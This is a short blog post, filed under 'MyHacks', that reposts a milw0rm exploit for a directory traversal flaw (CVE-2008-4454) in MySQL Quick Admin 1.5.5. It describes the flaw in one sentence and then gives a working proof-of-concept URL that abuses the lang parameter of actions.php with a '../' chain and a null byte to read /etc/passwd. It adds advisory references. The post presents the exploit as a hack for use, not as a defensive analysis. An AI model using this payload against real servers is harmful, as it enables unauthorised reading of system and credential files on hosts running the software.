SecurityGyan

Author Archive

MySqlQuickAdmin Directory Traversal Exploit

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################
Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot)
in the lang parameter to actions.php.

published at milworm :http://www.milw0rm.com/exploits/7020

###############################################################################

POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang?=../../../../../../../../../../etc/passwd%00

###############################################################################
references:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454

http://secunia.com/advisories/31820

###############################################################################

# milw0rm.com [2008-11-06]

Leave a Comment more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Links

A few highly recommended links...

Archives

All entries, chronologically...